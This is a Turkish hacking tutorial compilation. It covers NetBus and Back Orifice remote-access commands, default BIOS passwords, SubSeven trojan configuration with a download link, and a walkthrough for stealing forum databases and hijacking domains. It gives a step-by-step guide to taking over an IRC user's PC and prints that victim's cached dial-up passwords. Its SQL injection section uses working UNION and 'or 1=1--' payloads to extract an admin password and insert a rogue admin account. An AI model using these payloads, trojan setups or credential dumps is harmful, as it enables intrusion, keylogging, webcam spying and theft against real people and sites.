(file.0 Key click off Listen.1 Start (keyboard) bir nevi keyloger adamın yazdıklarını gorursunuz Listen.1 Windos'u kapar GetApps Calısan prg.1.0 Stop listening Message.serverport. c:\command.1 Key click on KeyClick.VICTIMSemail. Klavye tekrar aktif olur DisableKeys.any ENTER'a bas ve ServerPwd.(message) Messagebox halinde mesaj yolalrsınız NewSetup.Resimde de görüldüğü üzere programın tespit ettiği bilgiler hemen ekrana geliyor TELNETTEN NETBUS KOMUTLARI Burdaki komutlar Netbus'ı kullanmayı sevmeyenler icin telnetten netbus komutları.Sahsen ben netbus kullanmıyorum..exe) istediginiz dosyayi cekersiniz Eject.1.1.0.ları listeler GetACL Admin Listi verir GetInfo Info penceresini verir GetDisks Hardiskindeki dosyaları gosterir GetSetup Server icin ayarları verir GetUser Kullanıcı hakkında bilgi verir GetVolume Sesi acar KeyClick.wav) wav dosyası calar .yenisifre Passwordu deistirir(1. İe uzerinden program calistirir.1 CD-ROM'u acar Eject.(filename.(path:\filename.100 CaptureScreen Ekrandan goruntu alır DelFile.(keys) harfleri iptal eder [kullanıcı klavyeyi kullanamaz] DisableKeys.(path:\filename.youremail.password.7) Password.1.exe). AppRedir..0 CD-ROM'u kapar ExitWin.6) PlaySound.abcdefghijklmnopqrstuvwxyzåäö Harfler kullanılmaz hale gelir DownloadFile.com.exe) Dosya siler DisableKeys.smtpserver Sends the new admindata (1.

. Bu şifreler BIOSun türüne göre değişir ben bazılarını en sık üretilenler sırasına göre verim AWARD BIOS alfaromeo AW AWARD AWARD_PS AWARD_PW AWARD_HW AWARD_SW .(xpos).0 Mouse'u eski haline getirir StartApp.(ypos) Mouse'u oynatırsınız SwapButton.(destination dir) Dosya yollarsınız URL.(destination port) Redirect the specified port Record.(file. Peki bunların şifreleri nelerdir.2.10 = 10 saniyelik ses kaydeder RemoveServer.exe) Resim gosterir SendKeys.com/) yazılan sayfaya gider BiOS ŞİFRELERİ ve BİOS ŞİFRESİ KIRMAK BIOS Şifrelerini konusunu biraz araştıracak olursak.. bilmeyenler için Kırılması en zor şifrelerden biridir.(listen tcp port).(www.(size).. Peki bundan nasıl kurtulacaksınız.(ip)| Set (admin) access IP`s SetMousePos. Ancak bazende BIOS passwordların Board`un ilk kullanıldığı gibi kalır.gönderileceksayfa.0 Kaldırmayı iptal eder ShowImage. önce kasayı açmanız gerekecek daha sonra BIOS pilini kasadan 5dk lığına çekin.PortRedir. ama gizli bir iş için yapacaksanız mesela hırsızlık falan.13 Sends ozel tuslar [sag.1 Mouse'un tuslarının yerlerini degistirir SwapButton.(words) Mesaj yollar * tusu ile yazdıgınız siler SendKeys. Bilgisayar sahibi şifreyi bildiği için değiştirmez yada değiştirmeyi bilmediği için denemez. Öncelikle bilmeyenler için söyleyim BIOS Password bilgisayarınız henüz açılma aşamasındayken karşınıza çıkan şifredir..exe) Program calıstırır UploadFile.. zaman alacaktır.asagi] SetACL.sol..(file. Çok kolay.. bilgisayarı 5dk sonra çalıştırdığınızda BIOS şifresi sormayacaktır.1 Server'ı kaldırır RemoveServer. Yada bazı Boardların BIOSlarındaki özel Jumperlardan yararlanabilirsiniz..(ip).exe).yukari.(file.

M.M. AMI SW AMI_SW BIOS PASSWORD HEWITT RAND Oder A.AWARD PW AWARD SW _award awkward j64 j256 j262 j322 01322222 589589 589721 HLT SER SKY_FOX Syxz aLLy CONCAT TTPTHA aPAf HLT KDD ZBAAACA ZAAADA ZJAAADC djonet AMI BIOS: AMI ami bios setup cmos AMIDECODE A. ) Phoenix: phoenix Compaq: compaq Tinys: Tiny Bazı Diğer BIOS Şifreleri: .I. AMI!SW AMI?SW HEWITT RAND alfarome efmukl ( işte schoolbusın şifreside burdan çalınmıştır.I.

. Sonra netbus'ı calıstırıp hostname/ip yazan yere wingateden buldugunuz ipyi yazın.baglana tıklıyoruz.. "Hostname or Ip" yazan yere kurbanımızın ip numarasını giriyoruz.. İlk olarak bu olayları gerceklestirmek icin 4 adet programa ihtiyacimiz var...7 yazar.....1..LKWPETER lkwpeter BIOSTAR biostar BIOSSTAR biosstar ALFAROME Syxz Wodj PASS PASSOFF CONDO J64 BIOS SETUP CMOS admin system <!--[if !supportLineBreakNewLine]--> <!--[endif]--> KARŞI BİLGİSAYARA GİRME Bu bolumde... secenek olan try to open the port only" i secerek "scan!" butonuna basıyoruz.cehennem bu yazıyı pasteliyoruz.ve sifre cehennem oluyor.. yukarda netbus 1.Bo.Eger sifre istemezse isiniz kolay. Ana bilgisyar adı: wingatede buldugmuz ipyi yazıyoruz Baglantı Noktası kısmına ise netbus portu olan 12345 yaziyoruz.... Baglana gelip uzaktaki sistem'e tıklayın.123 ServerPwd. baskalarının bilgisayarına girme ve internet sifrelerini calma olaylarını ogrenicez. Telnet(her windowsun icinde vardir).Diger programlari İlk olarak irc'de kendimize bir kurban secip. Ben sifre istedi varsayıyorum ve anlatmaya devam. ip numarasını alıyoruz (/dns nickname).siz sifreyi cehennem yerine baska bir seylerde yapabilirsiniz.... Sonra wingate'i calıstırıyoruz.Bul (find) dan telnet'i buldurup calıstırın.. Telnet her windowsta vardir... Sifre isterse telnetten sifreyi kırmamız lazım.6 veya 1. "Servers found" kısmında bir kac tane ip yazması lazım sansa bir tanesini secin. Netbus.. "Scan Port" kısmında 23 seklindeki rakamları 12345 yapıyoruz sonra asagıdan 3..Wingate. simdi sifreyi kirmak icin Password. ...

..Artık adamın bilgisayrındayız.End of Data ------------------** 1:System passwords packet sent (19 bytes) val1: '' val2: '' ---------. bu arada adamdan cikan passler ** 0:Ping host packet sent (19 bytes) val1: '' val2: '' ---------..schoolgirls.Packet received from host 194.78.com/members only' Password: 'burp:burp' index:25(01) len:28(07/122) Resource: 'WINDOWS' Password: 'PAKSOYKAROLAû' index:00(06) len:74(53/122) Resource: '*Rna\AT&T WorldNet Service@000000@worldnet. Bo da dah cok sey yapabilirsiniz ama onlarida sonra anlatirimmm.exe diyoruz...148 port 31337 --------Password cached by system: index:02(06) len:34(20/52) Resource: 'crypt_Blizzard_Storm' Password: '›óå‘P' index:09(19) len:52(41/22) Resource: 'www.att Bu mail adresi spam botlara karşı korumalıdır. c:\windows yazarak windowsun altina atiyoruz yolladiktan sonra download ewkranını kapiyoruz.yan tarafada 12345 yan taraftan system passwordsu secip send e basıyoruz ve bingoooo bu adımda 10un ustunde password varmis.com/restricted directory' Password: ':' index:13(19) len:50(31/102) Resource: 'www.exe yi yolluyoruz. tamam netbustaki isimizde bitti...148 port 31337 --------!PONG!1...242.nereye yolliycagimizi soruyor..c:\windows\boserve..20!WINDOWS! ------------------------. görebilmek için Javascript açık olmalıdır' Password: 'aaaaaaaaaaaa' index:04(06) len:68(50/92) Resource: '*Rna\Microsoft Internet Referral Service\icwsignup' Password: 'icwsignup9.sexxxfarm. start program diyoruz..78.Packet received from host 194. Şimdi Back Orifice'ye geçiyoruz target host:porta adamın ipsini yazıyoruz. file manager'a gelerek adama boserve..242.Sonra bir daha netbus'a gidiyoruz artık sifre cehennem giriyoruz..' index:07(06) len:44(27/82) Resource: '*Rna\Turk Nokta Net\abaygan' Password: 'need-bob' index:08(06) len:38(25/52) Resource: '*Rna\Turk Nokta Net\burak' Password: 'burak' index:10(06) len:22(14/02) Resource: '*Rna\sol\amnık' Password: '*' index:05(06) len:42(27/72) Resource: '*Rna\Turk Nokta Net\necatit' Password: 'eynesil"' index:11(06) len:34(19/62) Resource: '*Rna\Alnet\ersinari' Password: '987199$' index:15(06) len:36(21/62) ..

Boserve. Program hem cok basit kullanimi bunun yaninda çok islevli olmasi en büyük özelligi..exe: Server programi.. Sitemden çekmis oldugunuz backorifice daki dosyalari taniyalim .exe: Programin dos versiyonu (ben bunu tavsiye ederim) Boconfig.exe: Programin ayarlarinin yapildigi dosya Nasil Baglanacagim? Karsi pc ye server dosyasini açtirdikdan sonra Command bolumunden ping host 'i seçiyoruz ve send e tikliyoruz.Resource: '*Rna\Burak\rbayraktar' Password: '963963' index:16(06) len:42(27/62) Resource: '*Rna\Bağlantım 5\rbayraktar' Password: '963963.' index:21(06) len:46(25/122) Resource: '*Rna\Bağlantım 7\ baycenk' Password: 'gizlikorkunc' index:23(06) len:28(19/12) Resource: '*Rna\bayrak\baycenk' Password: ' -' index:14(06) len:30(16/52) Resource: '*Rna\Burak\burak' Password: 'burakì-' index:12(06) len:30(16/62) Resource: '*Rna\Alnet\merko' Password: 'merko7&' index:24(06) len:38(17/122) Resource: '*Rna\cenk\baycenk' Password: 'paksoykarolaa' index:01(04) len:18(05/52) Resource: 'MAPI' Password: 'MAPI' index:03(19) len:14(04/12) Resource: 'NNTP' Password: ':' End of cached passwords. Baglandigimiza dair biseyler gelirse (merak etmeyin eger baglanirsaniz mutlaka anlarsiniz unlemli 3-4 satir bi yazi cikar) ... Pc ye reset atabilir.. Unable to read value 'ScreenSave_Data' ------------------------. ekran koruyucu sifresine kadar bir çok sifresini çalabilirsiniz.End of Data ------------------- BACKORIFICE VE KULLANIMI Karsi pclere saldirmak için yapilmis bir program.Dosyalari üzerinde istediginiz degisikligi yapabilirsiniz. Bogui. Bocilient. Backorifice sayesinde karsi pc nin internet sifresinden.exe: Kendi kullanacagimiz dosya.$' index:17(06) len:36(19/82) Resource: '*Rna\Burak\r1056700' Password: 'DABmvsVG·(' index:18(06) len:40(19/122) Resource: '*Rna\Burak\doganalp' Password: 'alpdogan<BR>ß' index:19(06) len:18(10/02) Resource: '*Rna\nolur' Password: '$' index:20(06) len:36(19/82) Resource: '*Rna\Burak\b1000025' Password: 'ncVCjYFu¬ ' index:06(06) len:32(16/82) Resource: '*Rna\AİDATA\suen' Password: '68913672$' index:22(06) len:36(22/62) Resource: '*Rna\Bağlantım 4\merko' Password: 'merko7. Yani karsi pc ye yollamamiz gereken dosya.

FOX PRO'dur.kisinin pc sindeyiz demektir neler mi yapabiliriz? Directory List: Klasörleri listeler unused (soldaki) bolume yolu yaziyoruz. SQL SERVER. Unused (soldaki) dosya adini yazin. . Database = Veritabani Nedir : Veritabani verilerimizin düzenli olarak saklandigi dijital bir ortamdir. Unused (soldaki) yolu yazin. Directory Remove: Klasör siler. Unused (soldaki) dosyanin adi ve yolunu yazin. MS ACCESS. Syetem Dialog Box: Mesaj için. File Delete: Dosya silmek için. Unused (soldaki) bölümüne olusturulacak klasoru yazin. birçok firmanin ürettigi db programlari mevcuttur.. System Info: Pc nin sistemi hakkinda bilgi verir. System Reboot: Reset attirir Tcp File Recieve: Dosya indirmek için. Verilerimizi anlamli kilmak da bizim bilfimizi olusturur. Unused (sol) a dosya adi unused (sag) hedef dosya : port Pcp File Send: Dosya yollamak için. Ama bunlarin en bilinenleri ORACLE . Unused (soldaki) 'e mesajinizi Unused (sagdaki) mesaj kutusunun basligini yazin. Veritabani Programlari: Günümüzde. Unused (sol) a dosya adi unused (sag) hedef dosya : port Bo Client Bunlarin disinda boclient.exe adli dosya ile de baglanabiliriz ASP SQL ENJEKSIYON ASP Sql Enjeksiyon a geçmeden önce bir kaç temel kavrama bakalim. Keylog Begin: Kayit dosyasi. Mm Play Sound: Wav dosyalarini caliltirmak için. Unused(sagdaki) 'e hedef dosyayi yazin. File Find: Dosya bulmak için. File Copy: Dosya kopyalamak için Unused (soldaki) 'e kaynak dosyayi. Directory Create: Klasör olusturur.. Unused (soldaki) 'e dosyanin adini yazin.

Iste SQL ENJEKSIYON DA ILK BASTA SITENIN DB sindeki TABLO Ismini bilmemiz gerekmez mi sizce yoksa SELECT WHERE Falan nasi kullanalim o nedenle SqL a ilk basta hata verdirip Tablo ismini ögrenmeliyiz. Örnegin MS ACCESS'te bunu yapmanin baska yöntemleri de olsa. sorgulamanin hangi kriter ya da kriterlere göre yapilacagini belirtmemizi saglar. sorgunun sonundaki WHERE kriterine göre tespit edilen kriterlerin hangi alanlarinin görüntülenecegi bilgisidir.Uygulama gelistiriciler. SELECT fiyat FROM xchatx WHERE dokuman ismi="hack" SELECT deyiminden sonraki gelen ilk ifade. WHERE deyimi ise . Bu anlamda genis kabul görmüs bir standarttir. Örnek bir Sql ifadesi yazalim.SQL Nedir : Sql (Structured Query Language) bir veritabani dilidir. FROM deyiminden sonraki ifade. sonuçta Sql karsiligi her zaman vardir. bir veritabanina yeni tablo veya veri eklerken. silerken veya bir veriyi ararken bu dili kullanirlar. diyelim ki xchatx tablosundan Hack isimli dökümanin fiyatini bize bulsun :) Sql da sorgulamalar SELECT ile yapilir Bu sorgu yazilisi . SQL Hata verdirtmek için sunlar yapilabilir: Asp sql enjeksiyondan bahsedecegim . sorgulkamanin hangi tablodan yapilacagini bildirir.

asp.Asp sitemizin tabiki db si ve sql si olan :) search engine ya da login barina : Bunu yaziyoruz :) Egeeer : Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’xchatx1’ to a column of data type int. /index. Baska türlü de sql a hata verdirebilirsiniz : ’ or 1=1-- " or 1=1-- ’ or ’a’=’a or 1=1-- ’) or (’a’=’a . line 29 Burda illa da line 29 ve index..asp olmak zorunda degil tipa tip aynisi olmayacak elbette sadece Sytntax error oracle falan çikmasi lazim..

. simdi o hatayi aldik da ne oldu diyorsaniz orda TABLE ismini ögrendik :) xchatx1 table namemimiz.... Burdan diger table isimlerini de ögreniriz. Simdi örnek bi saldiri yapalim ve yeni seyler ögrenelim biraz daha : ilk önce kurban siteyi seçtik. Simdi burdan diger tablolarinda ismini ögrenmemiz lazim.. SELECT* FROM xchatx1 WHERE dokumanID=’’ or 1=1--’ Burda yaptigimiz sey bize xchatx1 table inda dokumanIDsi bos olan seyi getir ya da 1=1 degerine uyan tabloyu getir dedik burda feyk attik SQL a yani.asp?catid=3 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-- UNION SQL a birden çok soru sormak için kullandik... Baktik sql açigi da var ’ bu isaret ile test ettik açik var yani. . Önümüze.siteadi.org/index.. Sonra istedigimiz seyi SELECT WHERE deyimlerini kullanarak getiririz.." or "a"="a Bunlari da aynene deneyin . http://http://www.

/index.asp.asp?catid=3 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-.siteadi.asp. line 3 .INFORMATION_SCHEMA. line 23 Hatamizi aldik :) Top 1 table_name serles mis!! Simdi isimize yarayacak tablelari ögrenelim mesela admin table larini burda da LIKE deyimini kullanicaz içinde admin geçen kelimeleri getir bize SQL!!! dicez :) http://www.TABLES WHERE TABLE_NAME LIKE ’% 25admin%25’-- Hatayi aliyoruz : Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’ [Microsoft][ODBC sql Server Driver][sql Server]Syntax error converting the nvarchar value ’admins’ to a column of data type int.ise hiç table ismi bilmedigimiz için yazdik Top 1 table_name ise en üstteki tablo anlamina geliyor.org/index. /index. Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’ [Microsoft][ODBC sql Server Driver][sql Server]Syntax error converting the nvarchar value ’serles’ to a column of data type int.

org/index. .COLUMNS deyimini yazdik.Burda admin diye baslayan admins diye bir table var. Yani yine feyk attik sql’e. /index.siteadi.COLUMNS WHERE TABLE_NAME=’admins’ WHERE COLUMN_NAME NOT IN (’logonID’)-Burda en tepede olan ama LogonID olmayani istedik ve hatayi görelim: Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’ [Microsoft][ODBC sql Server Driver][sql Server]Syntax error converting the nvarchar value ’logs’ to a column of data type int.COLUMNS WHERE TABLE_NAME LIKE = ’admins’-Burada da INFORMATION_SCHEMA.TABLES yerine INFORMATION_SCHEMA.siteadi. sütünü istiyoruz : http://www.asp?catid=3 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA. line 22 ilk kolum LogonID çikti :) Simdi 2.asp. o da bu feykimizi yedi: Hatayi alalim : Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’ [Microsoft][ODBC sql Server Driver][sql Server]Syntax error converting the nvarchar value ’logonID’ to a column of data type int. Simdi bu admins table inin column yani sutünlarini ögrenme zamani! Kodu yaziyoruz : http://www.asp?catid=3 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.org/index.

details’)-Hata : Microsoft OLE DB Provider for ODBC Drivers error ’80040e14’ [Microsoft][ODBC sql Server Driver][sql Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.asp?catid=3 UNION SELECT TOP 1 password FROM admins where logon=’ xrealcrack ’-Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’ [Microsoft][ODBC sql Server Driver][sql Server]Syntax error converting the nvarchar value ’albert8387vsc’ to a column of data .org/index. line 7 ve admin nick geldi.asp. http://www.asp.’logs’.siteadi.COLUMNS WHERE TABLE_NAME=’admins’ WHERE COLUMN_NAME NOT IN (’logonID’. /index.siteadi.org/index.’password’.asp?catid=3 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.asp?catid=3 UNION SELECT TOP 1 logon FROM admins-admins table indaki logon sütunundaki ilk ini seçiyoruz.Ögrendik adi logs. /index.siteadi. Artik sifre neredeyse geliyor kucagimiza :) Önce Password ve detaillarina bakicaz. xrealcrack isimli kullanicinin sifresini ver bize SQL :) : http://www.org/index. Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’ [Microsoft][ODBC sql Server Driver][sql Server]Syntax error converting the nvarchar value ’xrealcrack’ to a column of data type int. line 4 iki sütün var sansimiza güvenelim ilk logonu deneyelim : http://www.

’password’. INSERT INTO ’admins’ (’logonID’.type int.siteadi. /index.. ’logon’.JPG yi tıklamayın..asp. line 4 Sifremizi aldik albert8387vsc :) ok artik hackledik..org/index. Subseven programının özellikleri (BURCU. Kendimiz de kullanici yaratabiliriz admins table inda logon column ünde :) Kodu : http://www. ’details’) VALUES (223.’SwmeRt’.’123456’. ÇÜNKÜ O KARŞI TARAFA GÖNDERECEĞİNİZ TROJANDIR) .’NA’)-SwmeRt nickli bi admin olusturduk sifresi de : 123456 iste bu kadar.asp?catid=3.

internet baglantısını koparabilir Disconnect server . . KEY / MESSAGE key logger : Kurbanın klavyesinde yazdıgı her seyi buradan görebilirsiniz chat : kurban ile bire bir chat yapmanizi saglar matrix : matrix aktif hale getirdiginizde kurban bilgisayarını tamamen kaplayan bir goruntu ile chat yapmanızı saglar msg manager : Buradan victim ın bilgisayar ekranında çıkacak değişik mesaj ayarları yapabilirsiniz.1 gibi bir mesajla karsılasırsanız sanslısınız baglandınız demektir. ÇÜNKÜ O BİR EXE DOSYASIDIR. serveri yeniden baslatabilir Restart server . AMA SİZ SAKIN BURCU.. CONNECTION get pc info : Kurban bilgisayarı hakkında bilgi alabilirsiniz. Yaratıcılık size kalmış . version: BoNuS 2.AYRICA PRG DE HACK PRG Sİ OLDUĞU İÇİN TROJANLIDIR. Portu default port olarak ayarlayabilirsiniz Set default password .JPG YE TIKLAMYIN. server options: Server ayarlarını degistirebilirsiniz .Kasım 19. Pazar. Yada alt tarafta satırda Connected 21:25. 2000. Cleant connection kurban bilgisayarında kac kisi oldugunu gosterir(eger 2 ise sizden baska birileri daha var demektir) get home info: Kendi bilgisayarınız hakkında bilgi verir. Arama islemi yaparken subseven trojan ı bulasmıs bilgisayarların ip adreslerini buldugunu gorursunuz! Buldugunuz ip leri uin/ip kısmına yazıyoruz Connect dedigimiz anda karsımıza sifre menusu cıkıyorsa sizden once birisi girmis demektir. Delay sayısını arttırarak daha genis ve detaylı bir arama yapar fakat yavas arayacaktır .21. server'e sifre koyabilir Set password sifreyi silebilir Remove password . ADINI VE UZANTISINI DÜŞMAN ANLAMASIN VE AÇSIN DİYE DEĞİŞTİRİLMİŞTİR (BU ARADA BURCU'DA BENİM subseven. ip notify : Bu bolumde yapılan ayarlar ile kurbanın internete girmesi ile icq Mırc ve mail yolu ile size kurban bilgilerini otomatik yollamasını saglayabilirsiniz .exe acıyoruz acılan menüde connection u secip ip scanner i tıklıyoruz Start ipi ve end ip kısımlarına aratılıcak ipleri giriyoruz (İnternet servis saglayıcıların ip leri daha iyi sonuc verir) Port kısmınada subseven default portu olan 27374 portunu giriyoruz . serveri bilgisayar kapatılınca yeniden acılacak sekılde acılmasını saglatabilir Close server yada yeni surumleri ile update etmek icin update server from local file / URL file kullanabiliriz . Port degistirebilirsiniz Change port .

(Server. Bunlar Subseven. Delay sayısını arttırarak daha genis ve detaylı bir arama yapar fakat yavas arayacaktır .exe dir.exe yi tıklamayın) subseven. Msn ve yahoo mesanger gibi chat programlarından gelen mesajları gorebılmenizi saglar icq takeover : kurbanın bilgisayarında kayıtlı bulunan icq uin numaralarını kendi bilgisayarınıza download etmenizi saglar daha sonro icq yu kurbanın adı altında acın ve daha once yazdıklarını da gorebılırsiniz ADVENCED ftp:/http : kurban bilgisayarına subseven kullanmadan da girebilirsiniz find files : Kurban bilgisayarında dosya aramaya yarar.exe acıyoruz acılan menüde connection u secip ip scanner i tıklıyoruz Start ipi ve end ip kısımlarına aratılıcak ipleri giriyoruz (İnternet servis saglayıcıların ip leri daha iyi sonuc verir) Port kısmınada subseven default portu olan 27374 portunu giriyoruz . window manager : windows altında calısan programları gorup bunlarla oynama yapabilirsiniz text-2-speech : kutucuga yazdıgınız yazıları kurban belgısayarında sesli olarak cıkmasını saglar.exe ve server. Aol. Arama islemi yaparken .spy : İcq. password : kurban bilgisayarındaki bir cok sifreyi goruntuler regedit : kurban bilgisayarında ki registry editorunu acıp degisiklikler yapabilirsiniz app redirect : cesitli dos komutlarini kurban bilgisayarinda calistırabilirsiniz port redict : acık olan portlarını gorup bunlara ekleme ve cıkarma yapabilirsiniz MISCELLANEOUS file manager : kurbanın harddiskini goruntuler kendi harddiskiniz gibi kullanmayı saglayan ozellıkler icerir. irc bot : kurban internete girdigi anda haberi olmadan server kenini bir IRC kanalına bot olarak sokar (ip ve port numarası bulmak icin ) FUN MANAGER desktop/webcam : Kurban bilgisayarının ekran goruntulerini alabilirsiniz full screen capture bir defalık tam ekran goruntusu alır open screen prewiev Zipli dosya içinde 3 exe dosyası birlikte gelecektir.exe Editserver. Tabiki kendi bilgisayarinizda yüklü olması gerekli (bkz download bolumune) clipboard manager : su anda calısmakta olan programları gorup kapatmanızı saglar.

version: BoNuS 2. server options: Server ayarlarını degistirebilirsiniz . Yada alt tarafta satırda Connected 21:25. Msn ve yahoo mesanger gibi chat programlarından gelen mesajları gorebılmenizi saglar icq takeover : kurbanın bilgisayarında kayıtlı bulunan icq uin numaralarını kendi bilgisayarınıza download etmenizi saglar daha sonro icq yu kurbanın adı altında acın ve daha once yazdıklarını da gorebılırsiniz ADVENCED ftp:/http : kurban bilgisayarına subseven kullanmadan da girebilirsiniz . KEY / MESSAGE key logger : Kurbanın klavyesinde yazdıgı her seyi buradan görebilirsiniz chat : kurban ile bire bir chat yapmanizi saglar matrix : matrix aktif hale getirdiginizde kurban bilgisayarını tamamen kaplayan bir goruntu ile chat yapmanızı saglar msg manager : Buradan victim ın bilgisayar ekranında çıkacak değişik mesaj ayarları yapabilirsiniz.subseven trojan ı bulasmıs bilgisayarların ip adreslerini buldugunu gorursunuz! Buldugunuz ip leri uin/ip kısmına yazıyoruz Connect dedigimiz anda karsımıza sifre menusu cıkıyorsa sizden once birisi girmis demektir. Aol. ip notify : Bu bolumde yapılan ayarlar ile kurbanın internete girmesi ile icq Mırc ve mail yolu ile size kurban bilgilerini otomatik yollamasını saglayabilirsiniz .1 gibi bir mesajla karsılasırsanız sanslısınız baglandınız demektir. Pazar.. serveri bilgisayar kapatılınca yeniden acılacak sekılde acılmasını saglatabilir Close server yada yeni surumleri ile update etmek icin update server from local file / URL file kullanabiliriz .Kasım 19. Yaratıcılık size kalmış .21. spy : İcq. CONNECTION get pc info : Kurban bilgisayarı hakkında bilgi alabilirsiniz. 2000. serveri yeniden baslatabilir Restart server . Portu default port olarak ayarlayabilirsiniz Set default password . Port degistirebilirsiniz Change port . internet baglantısını koparabilir Disconnect server . server'e sifre koyabilir Set password sifreyi silebilir Remove password . Cleant connection kurban bilgisayarında kac kisi oldugunu gosterir(eger 2 ise sizden baska birileri daha var demektir) get home info: Kendi bilgisayarınız hakkında bilgi verir.

password : kurban bilgisayarındaki bir cok sifreyi goruntuler regedit : kurban bilgisayarında ki registry editorunu acıp degisiklikler yapabilirsiniz app redirect : cesitli dos komutlarini kurban bilgisayarinda calistırabilirsiniz port redict : acık olan portlarını gorup bunlara ekleme ve cıkarma yapabilirsiniz MISCELLANEOUS file manager : kurbanın harddiskini goruntuler kendi harddiskiniz gibi kullanmayı saglayan ozellıkler icerir. Tabiki kendi bilgisayarinizda yüklü olması gerekli (bkz download bolumune) clipboard manager : su anda calısmakta olan programları gorup kapatmanızı saglar. assagıda bulunan allow mouse clicks kutucugunuda isaretlersek bize gelen resim uzerinde yaptıgımız degısıklıkler kurban bılgısayarınada yansıyacaktır. irc bot : kurban internete girdigi anda haberi olmadan server kenini bir IRC kanalına bot olarak sokar (ip ve port numarası bulmak icin ) FUN MANAGER desktop/webcam : Kurban bilgisayarının ekran goruntulerini alabilirsiniz full screen capture bir defalık tam ekran goruntusu alır open screen prewiev kendi belirleyeceginiz aralıklarla ekran goruntusu alır ayrıca bu goruntuyu ne kadar buyutursenız goruntu kalıtesı o kadar netlesır . window manager : windows altında calısan programları gorup bunlarla oynama yapabilirsiniz text-2-speech : kutucuga yazdıgınız yazıları kurban belgısayarında sesli olarak cıkmasını saglar. webcam/quickcam capture : kurban bilgisayarında web camera varsa onun ve bulundugu bolgenın goruntulerini alabilirsiniz print : yazıcısından herhangı bir cıktı alabilirsiniz browser : herhangi bir url adresini yazarak ekran uzerine acılmasını saglayabilirsiniz resolution : ekran cozunurlugu ile oynamalar yapabilirsiniz. EXTRA FUN screen savers : ekran koruyucuyu degıstırebılırsınz .find files : Kurban bilgisayarında dosya aramaya yarar. win colors :windows renkelrini degistirebilirsiniz .

INI Less know method ( Az bilinen yontem ) Not know method ( Bilinmeyen yontem ) NOTIFICATION OPTIONS Victim Name ( kurban ismi ) Enable icq notify to UIN ( Kurbanının nete girince haber verilecek ICQ numarası ) Enable IRC Notify (Kurbanın Nete gırınce bot olarak gırecegi IRC kanalı ) E-mail Notify ( E-mail yoluyla haber verılen yontem ) INSTALLATION Automatically start server on port ( 27374 default porttur kendi port numaranızı da yazabilirsiniz) Use random port ( Her zaman farklı bir port acıp haber verir) .restart windows : windows u cesıtli sekillerde kapatabilirsiniz mouse : mouse ayarları ile oynayabilirsiniz sound : kurbanın odasında ses kaydı yapabilirsiniz time/date : tarih ve saat ayarlarını degıstırebilirsiniz extra : cesitli ozellikler olan bir bolum monıtor cd room gibi cihazlari acma kapama gibi LOCAL OPTIONS quality : capture ayarlamalari icin local folder : Karsi bilgisayardan download edilenlerin bulundugu klasor skins : subseven programınızın on planını tamamen degistirebilirsiniz misc options : ? advenced : port numaraları (matrix key logger spy port) run editserver : server ın edit edilebilmesini saglayan programı acar Subseven Editserver STARTUP METHOD Subseven programının kendini yazacagı windows yerin ayarlanması Registery Run Registery Runservis Key Name ( Verilecek dosya ismi ) WIN.

Server Password ( server sifresi ) Protect server and port and password ( server uzerınde degisiklik yapmayı engeller ) Enable IRC BOT SETTINGS ( Kurbanın bot olarak düsmesi istenilen IRC kanal ayarları) Server : irc.subsever.com Port : 6667 Nickname : kurban bot password : Prefix :@ channal to join : channal key : Melt server installation ( Kurban server ı tıklayınca kendi kendini silmesi icin ) Enable fake error ( Degisik hatamesajlari vermek icin ) Bind server whith EXE files ( server exe nin dikkat cekmemesi baska bir dosya ile birlestirmek icin ) PROTECT SERVER Protect the server so it can't be edited/changed (server ozellikleri degismesi icin sifre sorar ) Save new setting Save new copy of the server with the new setting ( hazırlanan serverı kopyalamak ve cıkmak icin kullanılır ) Quith withouth saving ( kaydetmeden cık ) .

.

.

..PROGRAMI İNDİRMEK İÇİN TIKLAYIN RAR ŞİFRESİ : www.pcdg.org KOLAY GELSİN HACKER PROGRAMLARININ YAYINLANIP YAYINLANMADIGI HAKKINDA BİR BİLGİM OLMADIGI İÇİN TERETTÜR İÇİNDE YAYINLIYORUM BU PROGRAMI UMARIM ÇOK İŞİNİZİ YARAYACAK. EGER BÖYLE PROGRAMLAR YAYINLANMIYORSA BİRİ BENİ UYARSIN İYİ GÜNLER DİLERİM Web Hack Yöntemleri .

3. Web sayfası üzerinden bir kaç mail alışverişi sayesinde bir domain adı geçici bir sürede olsa sizin adınıza geçiyor yada kullanılmaz hale geliyor.COM 1.mil uzantılı domainlerde etkili olunabiliyor.. 2. Database last updated on 3-Feb-2000 14:29:53 EST. Daha sonra bilgisayarınızda Microsoft Access varsa bu dosyayı açıp o forum un bütün şifrelerinin ele geçirebilirsiniz.com/forum/admin/wwForum. .com/forum adresinin google dan buldunuz ve siteye girdiniz eğer Snitz forum ise sonuna şunları ekleyin /snitz_forums_2000. Required ingredients: * Mail adresini saklayıp başka birisinin mailiymiş gibi gösterebileceğiniz bir anonymousmailer yada mailbomber programı. Free servislerde birinden alın.com/forum/snitz_forums_2000. En çok kullanılan 2 forum türü vardır biri Snitz diğeri ise Web Wiz Guide forum larıdır. bu yöntemle geçen haftalarda 400 e yakın üyesi olan bir forum u hackledim.mursal.EXAMPLE. Yanlız bu olay bütün forumlarda olmamaktadır.com/mursalforum/forum bunu ekleyin /admin/wwForum.. Aşağıdaki gibi bir tablo çıkacaktır. Geçirdiğiniz şifreler arasında admin şifreside bulunmaktadır bu sayede forum un ortasına hacked by .4 NS2. Who is yazan linke tıklayarak domain adresimizi girelim ve bu domain ile ilgili bilgilere ulaşalım.mdb" yi ekleyin örneğin color=#0000ff www.ahmetyigit. Yeterli Ingilizce. * Herhangi bir Fake mail adresi.net .mdb <eğer adam mdb dosyasının yerini değiştirmeden sitesine attıysa bütün kullanıcı isimleri ve 